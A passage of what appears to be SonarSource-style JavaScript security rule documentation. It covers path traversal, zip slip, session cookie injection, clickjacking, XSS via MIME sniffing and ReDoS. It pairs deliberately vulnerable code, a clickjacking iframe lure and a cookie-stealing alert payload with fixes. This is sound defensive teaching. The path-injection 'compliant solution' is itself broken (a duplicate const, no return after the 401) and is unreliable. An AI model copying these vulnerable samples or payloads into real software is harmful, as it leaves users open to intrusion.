  let data = fs.readFileSync(userFilename, { encoding: 'utf8', flag: 'r' }); // Noncompliant
}

Compliant solution

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  const userFilename = path.join(targetDirectory, req.query.filename);
  const userFilename = fs.realPath(userFilename);

  if (!userFilename.startsWith(targetDirectory)) {
    res.status(401).send();
  }

  let data = fs.readFileSync(userFilename, { encoding: 'utf8', flag: 'r' });
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like `fs.realPath`. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

const path = require('path');

function (req, res) {
  const targetDirectory = "/data/app/resources"
  const userFilename = path.join(targetDirectory, req.query.filename));
  const userFilename = fs.realPath(userFilename);

  if (!userFilename.startsWith(targetDirectory)) {
    res.status(401).send();
  }

  let data = fs.readFileSync(userFilename);
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Do not use path.resolve as a validator

The official documentation states that if any argument other than the first is an absolute path, any previous argument is discarded.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.

Resources

Standards

jssecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these enable control over the identity of the users within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session that can later be retrieved by them. This can lead to a variety of implications depending on what type of data is disclosed. Strictly confidential user data or organizational data leakage have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Express.js

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        const cookie = req.query.cookie;
        res.cookie("connect.sid", cookie); // Noncompliant
    }

    return res.redirect("/welcome");
});

Compliant solution

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        return res.redirect("/getcookie");
    }

    return res.redirect("/welcome");
});

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

jssecurity:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led in the past to the following vulnerabilities:

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

const { spawn } = require("child_process");
const input = req.query.input;
const proc = spawn("/usr/bin/find", [input]); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

const { spawn } = require("child_process");
const input = req.query.input;
if (allowed.includes(input)) {
  const proc = spawn("/usr/bin/find", [input]);
}

See

jssecurity:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip and an attacker is able to exploit it by submitting an archive he controls.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in Node.js

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

const AdmZip = require("adm-zip");
const upload = require('multer');

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        var writer = fs.createWriteStream(zipEntry.entryName); // Noncompliant
        writer.write(zipEntry.getData().toString("utf8"));
    });
});

Compliant solution

const AdmZip = require("adm-zip");
const upload = require('multer');

const unzipTargetDir = "/example/directory/";

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        const canonicalPath = path.normalize(unzipTargetDir + zipEntry.entryName);
        if (canonicalPath.startsWith(unzipTargetDir)) {
            let writer = fs.createWriteStream(canonicalPath);
            writer.write(zipEntry.getData().toString("utf8"));
        }
    });
});

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follow:

  1. Resolve the canonical path of the file by using methods like path.join or path.normalize. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string variable targetDirectory does not end with a path separator:

const AdmZip = require("adm-zip");

const targetDirectory = "/Users/John";

app.get('/example', (req, res) => {
    const canonicalPath = path.normalize(targetDirectory + req.query.filename)

    if (canonicalPath.startsWith(targetDirectory)) {
        const zip = new AdmZip(canonicalPath);
	    const zipEntries = zip.getEntries();

    	zipEntries.forEach(function (zipEntry) {
            var writer = fs.createWriteStream(zipEntry.entryName);
            writer.write(zipEntry.getData().toString("utf8"));
	    });
    }
});

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

javascript:S5732

Clickjacking attacks occur when an attacker try to trick an user to click on certain buttons/links of a legit website. This attack can take place with malicious HTML frames well hidden in an attacker website.

For instance, suppose a safe and authentic page of a social network (https://socialnetworkexample.com/makemyprofilpublic) which allows an user to change the visibility of his profile by clicking on a button. This is a critical feature with high privacy concerns. Users are generally well informed on the social network of the consequences of this action. An attacker can trick users, without their consent, to do this action with the below embedded code added on a malicious website:

<html>
<b>Click on the button below to win 5000$</b>
<br>
<iframe src="https://socialnetworkexample.com/makemyprofilpublic" width="200" height="200"></iframe>
</html>

Playing with the size of the iframe it’s sometimes possible to display only the critical parts of a page, in this case the button of the makemyprofilpublic page.

Ask Yourself Whether

  • Critical actions of the application are prone to clickjacking attacks because a simple click on a link or a button can trigger them.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy frame-ancestors directive which is supported by all modern browsers and will specify the origins of frame allowed to be loaded by the browser (this directive deprecates X-Frame-Options).

Sensitive Code Example

In Express.js application the code is sensitive if the helmet-csp or helmet middleware is used without the frameAncestors directive (or if frameAncestors is set to 'none'):

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'none'"] // Sensitive: frameAncestors  is set to none
    }
  })
);

Compliant Solution

In Express.js application a standard way to implement CSP frame-ancestors directive is the helmet-csp or helmet middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'example.com'"] // Compliant
    }
  })
);

See

javascript:S5734

MIME confusion attacks occur when an attacker successfully tricks a web-browser to interpret a resource as a different type than the one expected. To correctly interpret a resource (script, image, stylesheet …​) web browsers look for the Content-Type header defined in the HTTP response received from the server, but often this header is not set or is set with an incorrect value. To avoid content-type mismatch and to provide the best user experience, web browsers try to deduce the right content-type, generally by inspecting the content of the resources (the first bytes). This "guess mechanism" is called MIME type sniffing.

Attackers can take advantage of this feature when a website ("example.com" here) allows to upload arbitrary files. In that case, an attacker can upload a malicious image fakeimage.png (containing malicious JavaScript code or a polyglot content file) such as:

<script>alert(document.cookie)</script>

When the victim will visit the website showing the uploaded image, the malicious script embedded into the image will be executed by web browsers performing MIME type sniffing.

Ask Yourself Whether

  • Content-Type header is not systematically set for all resources.
  • Content of resources can be controlled by users.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Implement X-Content-Type-Options header with nosniff value (the only existing value for this header) which is supported by all modern browsers and will prevent browsers from performing MIME type sniffing, so that in case of Content-Type header mismatch, the resource is not interpreted. For example within a <script> object context, JavaScript MIME types are expected (like application/javascript) in the Content-Type header.

Sensitive Code Example

In Express.js application the code is sensitive if, when using helmet, the noSniff middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet({
    noSniff: false, // Sensitive
  })
);

Compliant Solution

When using helmet in an Express.js application, the noSniff middleware should be enabled (it is also done by default):

const express = require('express');
const helmet= require('helmet');

let app = express();

app.use(helmet.noSniff());

See

javascript:S6268

Angular prevents XSS vulnerabilities by treating all values as untrusted by default. Untrusted values are systematically sanitized by the framework before they are inserted into the DOM.

Still, developers have the ability to manually mark a value as trusted if they are sure that the value is already sanitized. Accidentally trusting malicious data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive information or impersonating other users.

Ask Yourself Whether

  • The value for which sanitization has been disabled is user-controlled.
  • It’s difficult to understand how this value is constructed.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid including dynamic executable code and thus disabling Angular’s built-in sanitization unless it’s absolutely necessary. Try instead to rely as much as possible on static templates and Angular built-in sanitization to define web page content.
  • Make sure to understand how the value to consider as trusted is constructed and never concatenate it with user-controlled data.
  • Make sure to choose the correct DomSanitizer "bypass" method based on the context. For instance, only use bypassSecurityTrustUrl to trust urls in an href attribute context.

Sensitive Code Example

import { Component, OnInit } from '@angular/core';
import { DomSanitizer, SafeHtml } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello" [innerHTML]="hello"></div>'
})
export class HelloComponent implements OnInit {
  hello: SafeHtml;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    let name = this.route.snapshot.queryParams.name;
    let html = "<h1>Hello " + name + "</h1>";
    this.hello = this.sanitizer.bypassSecurityTrustHtml(html); // Sensitive
  }
}

Compliant Solution

import { Component, OnInit } from '@angular/core';
import { DomSanitizer } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello"><h1>Hello {{name}}</h1></div>',
})
export class HelloComponent implements OnInit {
  name: string;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    this.name = this.route.snapshot.queryParams.name;
  }
}

See

javascript:S5852

Most of the regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input, in some cases it can cause performance issues, called catastrophic backtracking situations. In the worst case, the complexity of the regular expression is exponential in the size of the input, this means that a small carefully-crafted input (like 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact too with, in this case, a large carefully-crafted input (thousands chars).

This rule determines the runtime complexity of a regular expression and informs you if it is not linear.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen.

  • If you have a repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
  • If you have multiple repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example a*b* is not a problem because a* and b* match different things and a*_a* is not a problem because the repetitions are separated by a '_' and can’t match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition, if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example str.split(/\s*,/) will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like {1,5} instead of + for instance.
  • Refactor nested quantifiers to limit the number of way the inner group can be matched by the outer quantifier, for instance this nested quantifier situation (ba+)+ doesn’t cause performance issues, indeed, the inner group can be matched only if there exists exactly one b char per repetition of the group.
  • Optimize regular expressions by emulating possessive quantifiers and atomic grouping.
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*

Sometimes it’s not possible to rewrite the regex to be linear while still matching what you want it to match. Especially when the regex is not anchored to the beginning of the string, for which it is quite hard to avoid quadratic runtimes. In those cases consider the following approaches:

  • Solve the problem without regular expressions
  • Use an alternative non-backtracking regex implementations such as Google’s RE2 or node-re2.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or using multiple regular expressions. One example of this would be to replace str.split(/\s*,\s*/) with str.split(",") and then trimming the spaces from the strings as a second step.
  • It is often possible to make the regex infallible by making all the parts that could fail optional, which will prevent backtracking. Of course this means that you’ll accept more strings than intended, but this can be handled by using capturing groups to check whether the optional parts were matched or not and then ignoring the match if they weren’t. For example the regex x*y could be replaced with x*(y)? and then the call to str.match(regex) could be replaced with matched = str.match(regex) and matched[1] !== undefined.

Sensitive Code Example

The regex evaluation will never end:

/(a+)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Sensitive

Compliant Solution

Possessive quantifiers do not keep backtracking positions, thus can be used, if possible, to avoid performance issues. Unfortunately, they are not supported in JavaScript, but one can still mimick them using lookahead assertions and backreferences:

/((?=(a+))\2)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Compliant

See

javascript:S5730

A mixed-content is when a resource is loaded with the HTTP protocol, from a website accessed with the HTTPs protocol, thus mixed-content are not encrypted and exposed to MITM attacks and could break the entire level of protection that was desired by implementing encryption with the HTTPs protocol.

The main threat with mixed-content is not only the confidentiality of resources but the whole website integrity:

  • A passive mixed-content (eg: <img src="http://example.com/picture.png">) allows an attacker to access and replace only these resources, like images, with malicious ones that could lead to successful phishing attacks.
  • With active mixed-content (eg: <script src="http://example.com/library.js">) an attacker can compromise the entire website by injecting malicious javascript code for example (accessing and modifying the DOM, steal cookies, etc).

Ask Yourself Whether

  • The HTTPS protocol is in place and external resources are fetched from the website pages.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy block-all-mixed-content directive which is supported by all modern browsers and will block loading of mixed-contents.

Sensitive Code Example

In Express.js application the code is sensitive if the helmet-csp or helmet middleware is used without the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com']
    } // Sensitive: blockAllMixedContent directive is missing
  })
);

Compliant Solution

In Express.js application a standard way to block mixed-content is to put in place the helmet-csp or helmet middleware with the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com'],
      blockAllMixedContent: [] // Compliant
    }
  })
);

See

javascript:S5736

HTTP header referer contains a URL set by web browsers and used by applications to track from where the user came from, it’s for instance a relevant value for web analytic services, but it can cause serious privacy and security problems if the URL contains confidential information. Note that Firefox for instance, to prevent data leaks, removes path information in the Referer header while browsing privately.

Suppose an e-commerce website asks the user his credit card number to purchase a product:

<html>
<body>
<form action="/valid_order" method="GET">
Type your credit card number to purchase products:
<input type=text id="cc" value="1111-2222-3333-4444">
<input type=submit>
</form>
</body>

When submitting the above HTML form, a HTTP GET request will be performed, the URL requested will be https://example.com/valid_order?cc=1111-2222-3333-4444 with credit card number inside and it’s obviously not secure for these reasons:

  • URLs are stored in the history of browsers.
  • URLs could be accidentally shared when doing copy/paste actions.
  • URLs can be stolen if a malicious person looks at the computer screen of an user.

In addition to these threats, when further requests will be performed from the "valid_order" page with a simple legitimate embedded script like that:

<script src="https://webanalyticservices_example.com/track">

The referer header which contains confidential information will be send to a third party web analytic service and cause privacy issue:

GET /track HTTP/2.0
Host: webanalyticservices_example.com
Referer: https://example.com/valid_order?cc=1111-2222-3333-4444

Ask Yourself Whether

  • Confidential information exists in URLs.
  • Semantic of HTTP methods is not respected (eg: use of a GET method instead of POST when the state of the application is changed).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Confidential information should not be set inside URLs (GET requests) of the application and a safe (ie: different from unsafe-url or no-referrer-when-downgrade) referrer-Policy header, to control how much information is included in the referer header, should be used.

Sensitive Code Example

In Express.js application the code is sensitive if the helmet referrerPolicy middleware is disabled or used with no-referrer-when-downgrade or unsafe-url:

const express = require('express');
const helmet = require('helmet');

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer-when-downgrade' // Sensitive: no-referrer-when-downgrade is used
  })
);

Compliant Solution

In Express.js application a secure solution is to user the helmet referrer policy middleware set to no-referrer:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer' // Compliant
  })
);

See

javascript:S5739

When implementing the HTTPS protocol, the website mostly continue to support the HTTP protocol to redirect users to HTTPS when they request a HTTP version of the website. These redirects are not encrypted and are therefore vulnerable to man in the middle attacks. The Strict-Transport-Security policy header (HSTS) set by an application instructs the web browser to convert any HTTP request to HTTPS.

Web browsers that see the Strict-Transport-Security policy header for the first time record information specified in the header:

  • the max-age directive which specify how long the policy should be kept on the web browser.
  • the includeSubDomains optional directive which specify if the policy should apply on all sub-domains or not.
  • the preload optional directive which is not part of the HSTS specification but supported on all modern web browsers.

With the preload directive the web browser never connects in HTTP to the website and to use this directive, it is required to submit the concerned application to a preload service maintained by Google.

Ask Yourself Whether

  • The website is accessible with the unencrypted HTTP protocol.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement Strict-Transport-Security policy header, it is recommended to apply this policy to all subdomains (includeSubDomains) and for at least 6 months (max-age=15552000) or even better for 1 year (max-age=31536000).

Sensitive Code Example

In Express.js application the code is sensitive if the helmet or hsts middleware are disabled or used without recommended values:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 3153600, // Sensitive, recommended >= 15552000
  includeSubDomains: false // Sensitive, recommended 'true'
}));

Compliant Solution

In Express.js application a standard way to implement HSTS is with the helmet or hsts middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 31536000,
  includeSubDomains: true
})); // Compliant

See

javascript:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PUBLIC_READ, PUBLIC_READ_WRITE grant respectively "read" and "read and write" privileges to anyone, either authenticated or anonymous (AllUsers group).
  • AUTHENTICATED_READ grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e., to only grant users the necessary permissions for their required tasks. In the context of canned ACL, set it to PRIVATE (the default one), and if needed more granularity then use an appropriate S3 policy.

Sensitive Code Example

All users, either authenticated or anonymous, have read and write permissions with the PUBLIC_READ_WRITE access control:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

Compliant Solution

With the PRIVATE access control (default), only the bucket owner has the read/write permissions on the bucket and its ACL.

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

See

javascript:S5743

By default, web browsers perform DNS prefetching to reduce latency due to DNS resolutions required when an user clicks links from a website page.

For instance on example.com the hyperlink below contains a cross-origin domain name that must be resolved to an IP address by the web browser:

<a href="https://otherexample.com">go on our partner website</a>

It can add significant latency during requests, especially if the page contains many links to cross-origin domains. DNS prefetch allows web browsers to perform DNS resolving in the background before the user clicks a link. This feature can cause privacy issues because DNS resolving from the user’s computer is performed without his consent if he doesn’t intent to go to the linked website.

On a complex private webpage, a combination "of unique links/DNS resolutions" can indicate, to a eavesdropper for instance, that the user is visiting the private page.

Ask Yourself Whether

  • Links to cross-origin domains could result in leakage of confidential information about the user’s navigation/behavior of the website.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement X-DNS-Prefetch-Control header with an off value but this could significantly degrade website performances.

Sensitive Code Example

In Express.js application the code is sensitive if the dns-prefetch-control middleware is disabled or used without the recommended value:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: true // Sensitive: allowing DNS prefetching is security-sensitive
  })
);

Compliant Solution

In Express.js application the dns-prefetch-control or helmet middleware is the standard way to implement X-DNS-Prefetch-Control header:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: false // Compliant
  })
);

See

javascript:S2598

Why is this an issue?

If the file upload feature is implemented without proper folder restriction, it will result in an implicit trust violation within the server, as trusted files will be implicitly stored alongside third-party files that should be considered untrusted.

This can allow an attacker to disrupt the security of an internal server process or the running application.

What is the potential impact?

After discovering this vulnerability, attackers may attempt to upload as many different file types as possible, such as javascript files, bash scripts, malware, or malicious configuration files targeting potential processes.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Full application compromise

In the worst-case scenario, the attackers succeed in uploading a file recognized by in an internal tool, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

Server Resource Exhaustion

By repeatedly uploading large files, an attacker can consume excessive server resources, resulting in a denial of service.

If the component affected by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service can only affect the attacker who caused it.

Even though a denial of service might have little direct impact, it can have secondary impact in architectures that use containers and container orchestrators. For example, it can cause unexpected container failures or overuse of resources.

In some cases, it is also possible to force the product to "fail open" when resources are exhausted, which means that some security features are disabled in an emergency.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Formidable

Code examples

Noncompliant code example

const Formidable = require('formidable');

const form          = new Formidable(); // Noncompliant
form.uploadDir      = "/tmp/";
form.keepExtensions = true;

Compliant solution

const Formidable = require('formidable');

const form          = new Formidable();
form.uploadDir      = "/uploads/";
form.keepExtensions = false;

How does this work?

Use pre-approved folders

Create a special folder where untrusted data should be stored. This folder should be classified as untrusted and have the following characteristics:

  • It should have specific read and write permissions that belong to the right people or organizations.
  • It should have a size limit or its size should be monitored.
  • It should contain backup copies if it contains data that belongs to users.

This folder should not be located in /tmp, /var/tmp or in the Windows directory %TEMP%.
These folders are usually "world-writable", can be manipulated, and can be accidentally deleted by the system.

Also, the original file names and extensions should be changed to controlled strings to prevent unwanted code from being executed based on the file names.

Resources

javascript:S5742

Certificate Transparency (CT) is an open-framework to protect against identity theft when certificates are issued. Certificate Authorities (CA) electronically sign certificate after verifying the identify of the certificate owner. Attackers use, among other things, social engineering attacks to trick a CA to correctly verifying a spoofed identity/forged certificate.

CAs implement Certificate Transparency framework to publicly log the records of newly issued certificates, allowing the public and in particular the identity owner to monitor these logs to verify that his identify was not usurped.

Ask Yourself Whether

  • The website identity is valuable and well-known, therefore prone to theft.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement Expect-CT HTTP header which instructs the web browser to check public CT logs in order to verify if the website appears inside and if it is not, the browser will block the request and display a warning to the user.

Sensitive Code Example

In Express.js application the code is sensitive if the expect-ct middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
    helmet({
      expectCt: false // Sensitive
    })
);

Compliant Solution

In Express.js application the expect-ct middleware is the standard way to implement expect-ct. Usually, the deployment of this policy starts with the report only mode (enforce: false) and with a low maxAge (the number of seconds the policy will apply) value and next if everything works well it is recommended to block future connections that violate Expect-CT policy (enforce: true) and greater value for maxAge directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.expectCt({
  enforce: true,
  maxAge: 86400
})); // Compliant

See

javascript:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. In the case that adversaries gain physical access to the storage medium they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration. A volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-explicit', {
      availabilityZone: 'us-west-2a',
      size: Size.gibibytes(1),
      encrypted: false // Sensitive
    });
import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-implicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
    }); // Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'encrypted-explicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
      encrypted: true
    });

See

javascript:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

